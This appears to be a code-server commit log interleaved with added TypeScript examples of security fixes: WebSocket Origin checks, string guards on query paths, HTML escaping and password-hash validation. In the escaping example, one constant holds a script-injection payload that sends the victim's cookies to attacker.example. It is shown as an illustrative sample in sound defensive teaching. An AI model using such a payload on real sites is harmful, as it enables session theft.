The tilde is ambiguous and it can be helpful to know exactly what paths
code-server is trying to use, especially if it is running as a different
user than you expected.
* Move splitOnFirstEquals to util
I will be making use of this to parse the forwarded header.
* Type splitOnFirstEquals with two items
Also add some test cases.
* Check origin header on web sockets
* Update changelog with origin check
* Fix web sockets not closing with error code
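As an added example (my code, not code-server's), tying the commits above together: a `splitOnFirstEquals` typed to return exactly two items, used to parse a `Forwarded` header into the host the client actually connected to, and an Origin check for WebSocket upgrades that answers a rejected handshake with an HTTP status line before closing the socket instead of dropping it silently. The names `parseForwarded`, `getHost`, `ensureOrigin`, `rejectUpgrade`, the `HttpError` class and the sample header values are assumptions of this example.

```typescript
/** Split "key=value" on the first "=" only, so a value that itself contains
 *  "=" survives intact. Always returns two items; no "=" yields an empty value. */
export function splitOnFirstEquals(str: string): [string, string] {
  const i = str.indexOf("=")
  return i === -1 ? [str, ""] : [str.slice(0, i), str.slice(i + 1)]
}

/** Parse the first element of a Forwarded header (RFC 7239), e.g.
 *  `for=203.0.113.7;host=code.example.com;proto=https`, into key/value pairs.
 *  Quoted values (IPv6 `for="[2001:db8::1]:1234"`) lose their quotes.
 *  Limitation of this example: a comma inside a quoted value is not handled. */
export function parseForwarded(header: string): Record<string, string> {
  const out: Record<string, string> = {}
  for (const pair of header.split(",")[0].split(";")) {
    const [key, value] = splitOnFirstEquals(pair.trim())
    if (key !== "") out[key.toLowerCase()] = value.replace(/^"(.*)"$/, "$1")
  }
  return out
}

export interface UpgradeHeaders { host?: string; origin?: string; forwarded?: string }

/** Host the client connected to, honouring a reverse proxy's Forwarded header
 *  before falling back to the Host header of the hop that reached us. */
export function getHost(headers: UpgradeHeaders): string | undefined {
  const forwardedHost = headers.forwarded ? parseForwarded(headers.forwarded)["host"] : undefined
  return forwardedHost || headers.host
}

export class HttpError extends Error {
  constructor(message: string, public readonly status: number) {
    super(message)
  }
}

/** Refuse a WebSocket handshake whose Origin is not the host we are serving.
 *  Browsers send Origin on every WebSocket handshake, so a cross-site page
 *  cannot omit it; that is what makes this a cross-site WebSocket hijacking
 *  defence. Requests with no Origin at all (non-browser clients) are let
 *  through here, which is this example's choice, not a requirement. */
export function ensureOrigin(headers: UpgradeHeaders): void {
  if (!headers.origin) return
  const host = getHost(headers)
  if (!host) throw new HttpError("Forbidden: no host to compare against", 403)
  let originHost: string
  try {
    // Also rejects the literal opaque origin "null" (sandboxed iframes, data: URLs).
    originHost = new URL(headers.origin).host
  } catch (e) {
    throw new HttpError("Forbidden: malformed Origin", 403)
  }
  if (originHost !== host) throw new HttpError("Forbidden: Origin does not match host", 403)
}

/** Minimal view of the raw socket an HTTP server hands to an 'upgrade' listener. */
export interface RawSocket { write(data: string): unknown; destroy(): unknown }

/** Answer a failed handshake with a real HTTP status before closing, so the
 *  client sees an error code rather than an unexplained disconnect. Returns the
 *  bytes written so callers (and tests) can inspect them. */
export function rejectUpgrade(socket: RawSocket, err: HttpError): string {
  const reason = err.status === 403 ? "Forbidden" : "Bad Request"
  const response = `HTTP/1.1 ${err.status} ${reason}\r\nConnection: close\r\n\r\n`
  socket.write(response)
  socket.destroy()
  return response
}
```

One caveat when wiring this up: `new URL(...).host` drops a default port (`https://code.example.com:443` becomes `code.example.com`), so if a proxy forwards a Host of `code.example.com:443` the comparison fails; normalise both sides the same way before comparing.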
* refactor: fix type annotations in open
There was no clear reason as to why we needed to use type assertions
when initializing both `args` and `options` in `open` so I refactored
them both.
* refactor: create constructOpenOptions
* refactor: add urlSearch and remove options
* feat: add tests for constructOpenOptions
* revert: partial revert of 723469ab5bed3ba9fbb3e8d5ecbfcd9a3bee2d88
This reverts part of the changes introduced in refactor: migrate from argon2 ->
@node-rs/argon2 (#4733)
Switching to @node-rs/argon2 introduced bugs that we couldn't solve due to
limitations in npm.
see here
https://github.com/coder/code-server/issues/4804#issuecomment-1030338395
* chore(deps): replace argon2 w/@node-rs/argon2
* refactor: clean up hashPassword functions
* refactor(util): pass in process.platform
* fix: use correct settings for test-extension
Before, it was running into errors with an @types package.
Now, we're correctly running `tsc` so it picks up our `tsconfig.json` and we're
telling TypeScript to not typecheck our lib and exclude `node_modules`.
CodeQL caught a path where we were passing in req.query.path
to pathToFsPath, which may not have been a string.
So we refactored some things to ensure we only pass it a string
which also let us change the parameter type to string
instead of string | string[].
There's a chance this function can be called with a path that is not a string.
To catch that, we check if path is of a different type and throw an error if it
is.
This also adds a couple tests for this function.
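An added example (mine, not code-server's util) of the guard the two commits above describe: a helper that narrows a parsed query value down to a single string, and a `pathToFsPath` that refuses anything but a string before turning a URI path into a filesystem path. The name `getFirstString`, the reduced drive-letter handling, the explicit `platform` parameter and `resolveRequestedPath` are this example's assumptions.

```typescript
/** A query-string parser such as Express's turns `?path=a&path=b` into an
 *  array and `?path[x]=1` into an object, so a query value is never safely
 *  "just a string". Return the one string we are prepared to act on, or
 *  undefined so the caller can reject the request. */
export function getFirstString(value: unknown): string | undefined {
  if (typeof value === "string") return value
  if (Array.isArray(value) && typeof value[0] === "string") return value[0]
  return undefined
}

/** Convert a URI path (VS Code-style) to a filesystem path. Throws instead of
 *  coercing if a non-string slipped through, which is the case CodeQL flagged. */
export function pathToFsPath(path: unknown, platform: string = "linux"): string {
  if (typeof path !== "string") {
    throw new Error(`Could not compute fsPath: expected a string but received ${typeof path}`)
  }
  let value = path
  // A Windows drive path appears inside a URI as "/c:/dir"; drop the leading
  // slash and lower-case the drive letter so later comparisons are stable.
  if (/^\/[A-Za-z]:/.test(value)) {
    value = value.charAt(1).toLowerCase() + value.slice(2)
  }
  if (platform === "win32") value = value.replace(/\//g, "\\")
  return value
}

/** Handler-side use: reject up front unless `path` is exactly one string. */
export function resolveRequestedPath(query: Record<string, unknown>, platform: string = "linux"): string {
  const requested = getFirstString(query["path"])
  if (requested === undefined) throw new Error("Bad Request: path must be a single string")
  return pathToFsPath(requested, platform)
}
```

The split matters: `getFirstString` is where an untrusted shape is rejected, so `pathToFsPath` can keep a plain `string` signature and its own `typeof` check is a last line of defence rather than the place where request validation happens.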
This can be used to escape any special characters in a string with HTML before
sending from the server back to the client. This is important to prevent a
cross-site scripting attack.
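As an added example (my code, not code-server's helper) of the escaping the commit above describes, shown next to the unescaped rendering it replaces. `renderUnsafe`, `renderSafe` and the sample payload are constructed for this example.

```typescript
const HTML_ESCAPES: Record<string, string> = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
}

/** Escape the five characters that can break out of HTML text or a quoted
 *  attribute value. Escaping happens at the point of output, not on input, so
 *  the raw value stays usable for logging or filesystem work. */
export function escapeHtml(text: string): string {
  return text.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c] || c)
}

/** Before: client-controlled input lands in the page verbatim, so a crafted
 *  value runs as script on our origin in the victim's browser. */
export function renderUnsafe(requestedPath: string): string {
  return `<p>Could not open ${requestedPath}</p>`
}

/** After: the same template, with the value escaped where it is interpolated. */
export function renderSafe(requestedPath: string): string {
  return `<p>Could not open ${escapeHtml(requestedPath)}</p>`
}

// Constructed sample of what a client can put in a query parameter.
export const SAMPLE_PAYLOAD = `/tmp/x"><script>document.location="https://attacker.example/?c="+document.cookie</script>`
```

Note the escaping covers both text content and double- or single-quoted attribute values; it is not sufficient on its own for values placed inside `<script>` blocks, URLs or unquoted attributes, which need their own encoders.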
Previously, we used argon2 to verify the hash with the password.
If the hash didn't start with a $, then it would enter the catch block.
Now we check the hash before trying to verify it and we also throw an Error if
the verify fails.
This makes the isHashMatch function more robust.
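An added example (mine, not code-server's `isHashMatch`) of the ordering the commit describes: check the shape of the stored hash first, return false for anything that is not a hash at all, and surface an Error when the verifier itself fails rather than letting the catch block decide the answer. The argon2 bindings are not available offline, so Node's built-in scrypt stands in for argon2 here, written in the same `$name$params$salt$hash` (PHC) layout that argon2 strings use; `hashPassword`, `verifyPhc`, the parameter names and the sample salt are this example's assumptions.

```typescript
import { scryptSync, timingSafeEqual } from "node:crypto"

// PHC-style string, e.g. $scrypt$ln=14,r=8,p=1$<salt b64>$<key b64>.
// An argon2 string has the same shape: $argon2id$v=19$m=...,t=...,p=...$salt$hash.
export function hashPassword(password: string, salt: Buffer, ln = 14, r = 8, p = 1): string {
  const key = scryptSync(password, salt, 32, { N: Math.pow(2, ln), r, p })
  return `$scrypt$ln=${ln},r=${r},p=${p}$${salt.toString("base64")}$${key.toString("base64")}`
}

function param(params: Record<string, number>, name: string): number {
  const v = params[name]
  if (v === undefined || !Number.isInteger(v)) throw new Error(`bad or missing parameter ${name}`)
  return v
}

/** Recompute the key with the parameters stored in the hash and compare in
 *  constant time. Throws on any structural problem; a plain mismatch is false. */
function verifyPhc(password: string, hash: string): boolean {
  const parts = hash.split("$") // ["", "scrypt", "ln=14,r=8,p=1", salt, key]
  if (parts.length !== 5 || parts[1] !== "scrypt") throw new Error("unrecognised hash format")
  const params: Record<string, number> = {}
  for (const kv of parts[2].split(",")) {
    const eq = kv.indexOf("=")
    if (eq === -1) throw new Error("malformed parameter list")
    params[kv.slice(0, eq)] = Number(kv.slice(eq + 1))
  }
  const expected = Buffer.from(parts[4], "base64")
  if (expected.length === 0) throw new Error("empty hash")
  const actual = scryptSync(password, Buffer.from(parts[3], "base64"), expected.length, {
    N: Math.pow(2, param(params, "ln")),
    r: param(params, "r"),
    p: param(params, "p"),
  })
  return timingSafeEqual(expected, actual)
}

/** Guard order as in the commit: refuse empty input and anything that does not
 *  look like a hash before calling the verifier, and turn a verifier failure
 *  into a thrown Error instead of a swallowed false. */
export function isHashMatch(password: string, hash: string): boolean {
  if (password === "" || hash === "" || !hash.startsWith("$")) return false
  try {
    return verifyPhc(password, hash)
  } catch (error) {
    throw new Error(`password hash verification failed: ${(error as Error).message}`)
  }
}
```

The practical effect of the early return is that a legacy plaintext value in the hash slot never reaches the verifier, while a hash that is present but corrupt (wrong algorithm, missing parameter, bad encoding) is reported loudly rather than quietly treated as "wrong password".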